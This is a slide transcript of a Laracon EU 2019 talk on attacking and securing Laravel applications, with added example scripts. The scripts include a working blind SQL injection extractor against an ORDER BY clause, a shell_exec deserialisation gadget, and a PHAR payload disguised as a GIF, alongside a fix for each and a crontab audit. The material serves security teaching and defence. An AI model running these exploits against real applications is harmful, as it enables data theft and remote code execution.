
How Your Laravel Application Can Get Hacked?

You’ve probably heard about XSS, SQL Injection, and RCE. Very few developers have actually witnessed first-hand what exploiting any of these vulnerabilities looks like, and therefore don’t necessarily understand the consequences that having such vulnerabilities in an application can have. In this talk we’ll exploit some commonly known vulnerabilities and misconfigurations that can occur in a Laravel application running on a Linux-based host. By learning to think like a hacker you’ll be able to develop more secure applications with Laravel, and to keep yourself, your clients, and your users’ data safe.

Antti Rössi

August 29, 2019


Transcript

  1. How your Laravel application can
    get hacked, and how to prevent
    that from happening?
    Antti Rössi
    Laracon EU - Amsterdam 2019


  2. whoami
    Antti Rössi
    Helsinki, Finland
    CTO, Partner @ Jobilla Oy
    During daytime I’m building a digital
    software product.
    During night-time I hack software in
    order to make it more secure.
    (CTFs, pentesting, bug bounties,
    reversing…)
    @anamus_


  3. Faith of our users is
    in our hands
    (as developers and admins)

  4. Hack yourself first
    (before someone else does)


  6. !! Disclaimer !!
    All material and examples in this talk are for educational use only.
    The term ‘hacking’ in this presentation refers to ‘ethical hacking’ and should not be confused
    with ‘black hat hacking’, meaning attacking or attempting to attack any application, systems or
    network unauthorized.
    Hacking or attempting to hack anything you don’t own is by default illegal.
    Doing so will eventually get you in jail. Please act responsibly.
    Neither I, as the author of this presentation, nor any author of the tools used in it, shall be
    responsible for any individual performing illegal actions with the tools or methods shown here.
    The intent of this presentation and of all the demonstrations involved, is to help professional
    software developers to write more secure software.

  7. Where can I practise
    this then?

  8. Download the
    examples
    (Link to Github in my Twitter, @anamus_)

  10. SQL Injection
    (there’s also a NoSQL injection…)

  11. SQL Injection
    Attacker injects malicious
    SQL queries into an HTTP
    request.

  12. SQL Injection
    Can lead to a full
    disclosure of the DB
    content when successful.

  13. DB::raw("select * from users order by $order desc");

  14. SQL Injection
    Certain edge cases can be
    very hard to spot in code
    reviews.

  15. SQL Injection
    Easy to test & exploit
    with proper tooling.
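The `order by $order` on slide 13 is exactly the edge case that slips past code review: the injected value is an identifier, not a data value, so it cannot be bound as a PDO parameter, and the Laravel query builder documentation makes the same point about column names. The script below is an added example, not code from the talk. It uses PDO with an in-memory SQLite database instead of Laravel's DB facade so it runs stand-alone; the `users` table, its rows and the attacker's guess alphabet are constructed for the demo.

```php
<?php
// Added example (not from the talk): ORDER BY injection and its fix.
// Requires the pdo_sqlite extension. Run: php sqli_orderby.php

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)');
// Constructed sample rows: alice gets id 1, bob gets id 2.
$pdo->exec("INSERT INTO users (name, secret) VALUES ('alice', 's3cr3t'), ('bob', 'hunter2')");

// Vulnerable: the sort column is interpolated into the SQL text, which is
// what DB::raw("select * from users order by $order desc") does.
function listUsersVulnerable(PDO $pdo, string $order): array
{
    $sql = "SELECT name FROM users ORDER BY $order DESC";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Fixed: identifiers cannot be bound as parameters, so the only safe option
// is an allowlist of column names the caller is permitted to sort by.
function listUsersSafe(PDO $pdo, string $order): array
{
    $allowed = ['id', 'name'];
    if (!in_array($order, $allowed, true)) {
        throw new InvalidArgumentException("unsupported sort column: $order");
    }
    return $pdo->query("SELECT name FROM users ORDER BY $order DESC")->fetchAll(PDO::FETCH_COLUMN);
}

// Attacker payload: a CASE expression that flips the sort order depending on
// a condition about data the attacker must not see. Each request answers one
// yes/no question, so the secret leaks one character at a time (boolean-based
// blind SQLi). No quote is ever needed inside $order, so naive escaping of
// quotes would not have helped.
function probe(PDO $pdo, int $pos, string $guess): bool
{
    $payload = "(CASE WHEN (SELECT substr(secret, $pos, 1) FROM users WHERE name = 'alice') = '$guess'"
             . " THEN id ELSE -id END)";
    // ORDER BY id DESC puts bob first; ORDER BY -id DESC puts alice first.
    return listUsersVulnerable($pdo, $payload)[0] === 'bob';
}

$recovered = '';
for ($pos = 1; $pos <= 6; $pos++) {
    foreach (str_split('abcdefghijklmnopqrstuvwxyz0123456789') as $c) {
        if (probe($pdo, $pos, $c)) {
            $recovered .= $c;
            break;
        }
    }
}
echo "recovered via ORDER BY injection: $recovered\n";

try {
    listUsersSafe($pdo, '(CASE WHEN 1=1 THEN id ELSE name END)');
} catch (InvalidArgumentException $e) {
    echo "safe version rejected payload: {$e->getMessage()}\n";
}
```

Inside Laravel the same rule applies to `orderBy()` and to any `DB::raw()` that interpolates a column name: map the request value through an allowlist and fall back to a default column; a value that is not on the list never reaches the query.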

  16. Round 1
    Fight!

  17. Object
    Injection
    (from PHAR Deserialisation to Remote Code Execution)

  18. Quick
    theory lesson first

  19. Stream Wrappers in PHP
    file:// — Accessing local
    filesystem
    http:// — Accessing HTTP(s) URLs
    ftp:// — Accessing FTP(s) URLs
    php:// — Accessing various I/O
    streams
    zlib:// — Compression Streams
    data:// — Data (RFC 2397)
    glob:// — Find pathnames matching
    pattern
    phar:// — PHP Archive
    ssh2:// — Secure Shell 2
    rar:// — RAR
    ogg:// — Audio streams
    expect:// — Process Interaction
    Streams


  21. PHAR Files

  22. Complete PHP application in a
    single file bundle.

  23. phar:// allows reading
    PHP files from a PHAR bundle.

  24. Object Serialization
    In PHP

  25. Object -> String -> Object

  26. Example

  27. class Logger
    {
        public $file = 'log.txt';
        public $data = 'testing';
        public function __construct()
        {
            // ...
        }
        public function switchContext()
        {
            // ...
        }
    }

  28. $logger = new Logger();
    print serialize($logger);

  29. O:6:"Logger":2:{s:4:"file";s:7:"log.txt";s:4:"data";s:7:"testing";}

  30. O:6:"Logger":2:{s:4:"file";s:7:"log.txt";s:4:"data";s:7:"testing";}
    CLASS NAME

  31. O:6:"Logger":2:{s:4:"file";s:7:"log.txt";s:4:"data";s:7:"testing";}
    CLASS PROPERTIES
    (names, lengths, contents)

  32. No methods are
    included.
    (good move security wise…)

  33. Deserialised objects are
    automatically injected into the
    current application’s scope.

  34. Here comes the catch #1

  35. There are 2 magic methods that
    get called automatically.

  36. public function __wakeup()
    {
        // called upon deserialisation
    }
    public function __destruct()
    {
        // called before garbage collection
    }

  37. public $arg = 'id';
    public function __destruct()
    {
        shell_exec($this->arg);
    }

  38. O:6:"Logger":1:{s:3:"arg";s:2:"id";}


  40. O:6:"Logger":1:{s:3:"arg";s:3:"h4x";}

  41. public function __destruct()
    {
        shell_exec("h4x");
    }

  42. This is a so-called
    ‘Gadget’

  43. Here’s the
    catch #2

  44. PHAR files can
    contain metadata in
    a serialised format

  45. Any file operation on
    the archive through phar://
    will cause the metadata
    to be deserialised

  46. copy file_exists file_get_contents
    file_put_contents file fileatime filectime
    filegroup fileinode filemtime fileowner
    fileperms filesize filetype fopen is_dir
    is_executable is_file is_link is_readable
    is_writable lstat mkdir parse_ini_file
    readfile rename rmdir stat touch unlink


  48. Catch #3

  49. phar:// stream wrapper
    doesn’t discriminate
    between different filetypes

  50. 1. Take an image file
    2. Hide malicious PHAR file in it
    3. Call filesize() on it with phar://
    4. Object from PHAR metadata gets
    injected in application runtime
    5. Gadget kicks in on __destruct()
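The script below is an added example, not code from the talk, that runs through catches #1 to #3 end to end with the `Logger` gadget from slides 37 to 41: first the serialised string is handed straight to `unserialize()`, then the same object is stored as PHAR metadata in a file that starts with a GIF header, and a single `file_exists()` through `phar://` fires the gadget. The archive and image file names are assumptions, and the gadget only prints what it would execute instead of calling `shell_exec()`. Two caveats: building the archive needs `phar.readonly=0` (reading through `phar://` does not), and PHP 8.0 stopped unserialising PHAR metadata automatically on stream operations, so on 8.x the last line stays silent while the direct `unserialize()` part still works.

```php
<?php
// Added example (not from the talk): object injection via unserialize() and
// via PHAR metadata. Run on PHP 7.x with:
//   php -d phar.readonly=0 phar_gadget_demo.php

class Logger
{
    public $arg = 'id';

    // The talk's gadget calls shell_exec($this->arg). This stand-in only
    // reports what it would run, so the demo is safe to execute.
    public function __destruct()
    {
        echo "[Logger::__destruct] would run: {$this->arg}\n";
    }
}

// Catch #1: a serialised string of the attacker's choosing becomes a live
// object, and __destruct() runs as soon as it goes out of scope.
$payload = 'O:6:"Logger":1:{s:3:"arg";s:3:"h4x";}';
$obj = unserialize($payload);
unset($obj);                          // prints: would run: h4x

// Catch #2: PHAR metadata is stored serialised. Build an archive whose
// metadata is the same gadget. Paths below are assumptions.
$tmp      = sys_get_temp_dir();
$archive  = "$tmp/payload.phar";      // the Phar class needs .phar while building
$disguise = "$tmp/avatar.gif";        // identical bytes under an image name
@unlink($archive);
@unlink($disguise);

$phar = new Phar($archive);
$phar->startBuffering();
// Catch #3: any bytes may precede __HALT_COMPILER(); a GIF header lets the
// file pass a naive "is this an image?" check on magic bytes or extension.
$phar->setStub("GIF89a\n<?php __HALT_COMPILER(); ?>");
$phar->addFromString('x.txt', 'x');
$gadget = new Logger();
$gadget->arg = 'h4x';
$phar->setMetadata($gadget);          // serialised into the archive manifest
$phar->stopBuffering();
unset($phar);
unset($gadget);                       // builder's own copy; prints once more
rename($archive, $disguise);

// A plain path does nothing special. The phar:// path parses the manifest,
// unserialises the metadata, and the fresh Logger fires on garbage
// collection. filesize(), is_file(), stat() etc. would trigger it the same way.
var_dump(file_exists($disguise));
var_dump(file_exists("phar://$disguise"));
```

The defensive lesson is the one slide 61 draws: if a user-supplied string ever reaches a filesystem function, reject anything that is not a plain path, and in particular strip or refuse `phar://` (and the other wrappers on slide 19) before the call.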

  51. Round 2
    Fight!

  52. Privilege
    Escalation

  53. Privilege Escalation
    Exploiting a bug, design
    flaw, or configuration
    flaw…

  54. Privilege Escalation
    …to access resources
    otherwise unreachable
    to us.

  55. Privilege Escalation
    Eg. find a process that’s
    running as root, and
    exploit that.

  56. Privilege Escalation
    Hijack the process
    execution flow, but
    don’t crash it.

  57. Privilege Escalation
    Very few things should
    ever run as root on the
    host machine.

  58. Privilege Escalation
    Artisan scheduler is
    certainly not one of
    these things.
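Slides 57 and 58 are a configuration point: the cron entry the Laravel documentation gives for the scheduler (`php artisan schedule:run` every minute) is meant for the unprivileged application user, and installing it in root's crontab means every scheduled command, and anything the web-facing code can make one of them execute, runs as uid 0. The script below is an added example, not from the talk, with two checks a practitioner would want: an audit that flags scheduler jobs running as root in `/etc/crontab`-style text, and a guard that refuses to run scheduled work as root. The cron lines are constructed samples and the application path is an assumption.

```php
<?php
// Added example (not from the talk): least-privilege checks for the
// Laravel scheduler.

/**
 * Return descriptions of the jobs in system crontab text (minute hour dom
 * month dow USER command) that run as root and invoke php, which covers
 * "php artisan schedule:run". Per-user crontabs have no USER field and are
 * already bound to their owner, so this audit is for /etc/crontab and
 * /etc/cron.d/*.
 */
function findRootPhpJobs(string $crontab): array
{
    $hits = [];
    foreach (explode("\n", $crontab) as $i => $line) {
        $line = trim($line);
        if ($line === '' || $line[0] === '#' || preg_match('/^[A-Za-z_]+=/', $line)) {
            continue;   // blank, comment, or VAR=value assignment
        }
        if (!preg_match('/^(\S+\s+){5}(\S+)\s+(.+)$/', $line, $m)) {
            continue;   // not a five-field schedule line (e.g. @reboot)
        }
        [$user, $cmd] = [$m[2], $m[3]];
        if ($user === 'root' && preg_match('/\bphp\b/', $cmd)) {
            $hits[] = sprintf('line %d runs php as root: %s', $i + 1, $cmd);
        }
    }
    return $hits;
}

/**
 * Refuse to continue when the effective uid is 0. Call this at the top of
 * the console kernel's schedule() method (or in a scheduled command) so a
 * mistaken root crontab entry fails loudly instead of running as root.
 */
function assertNotRoot(): void
{
    // posix_geteuid() needs ext-posix; fall back to the POSIX id(1) command.
    $uid = function_exists('posix_geteuid')
        ? posix_geteuid()
        : (int) trim((string) shell_exec('id -u'));
    if ($uid === 0) {
        fwrite(STDERR, "refusing to run scheduled tasks as root\n");
        exit(1);
    }
}

// Constructed sample of an /etc/crontab; /var/www/app is an assumed path.
$sample = <<<'CRON'
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
# bad: the whole scheduler, and every command it dispatches, runs as uid 0
* * * * *   root     cd /var/www/app && php artisan schedule:run >> /dev/null 2>&1
# good: the same entry as the unprivileged application user
* * * * *   www-data cd /var/www/app && php artisan schedule:run >> /dev/null 2>&1
CRON;

foreach (findRootPhpJobs($sample) as $hit) {
    echo "ROOT SCHEDULER: $hit\n";   // reports the single bad line (line 5)
}

assertNotRoot();
echo "not running as root, scheduled work may continue\n";
```

Running the audit against the real `/etc/crontab` and `/etc/cron.d/*` on a host is a one-line change (`file_get_contents`), and the `run-parts` line in the sample shows why the match is on `php` rather than on `root`: system housekeeping legitimately runs as root, the application scheduler does not.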

  59. Round 3
    Fight!

  60. How to
    not get hacked?

  61. Tip #1
    Do not trust user input of
    any format.
    Validate everything.
    Sanitise everything.

  62. Tip #2
    Do not run outdated software
    in production.

  63. Tip #3
    Do not run code that you don’t
    understand in production.
    Eg. copy-pasting code from online
    tutorials.

  64. Tip #4
    Follow the principle of least
    privilege.
    Both in your application, and on
    your production host.

  65. Tip #5
    Learn to think like a hacker.
    And preferably the basics of
    hacking.

  66. Closing Words

  67. Security is not a one-
    time effort that you can
    tick off your to-do list.

  68. It’s an infinite ongoing
    process, and requires you to pay
    attention to it every single day
    you write or run code.

  69. “With great power comes
    great responsibility.”
    – Uncle Ben, Spider-Man

  70. Thanks!
    Twitter: anamus_

  71. Related Links & Materials
    • https://github.com/ambionics/phpggc
    • https://blog.ripstech.com/2018/new-php-exploitation-technique/
    • https://www.ixiacom.com/company/blog/exploiting-php-phar-deserialization-vulnerabilities-part-1
    • https://www.youtube.com/watch?v=GePBmsNJw6Y
    • Hack The Box - CronOS
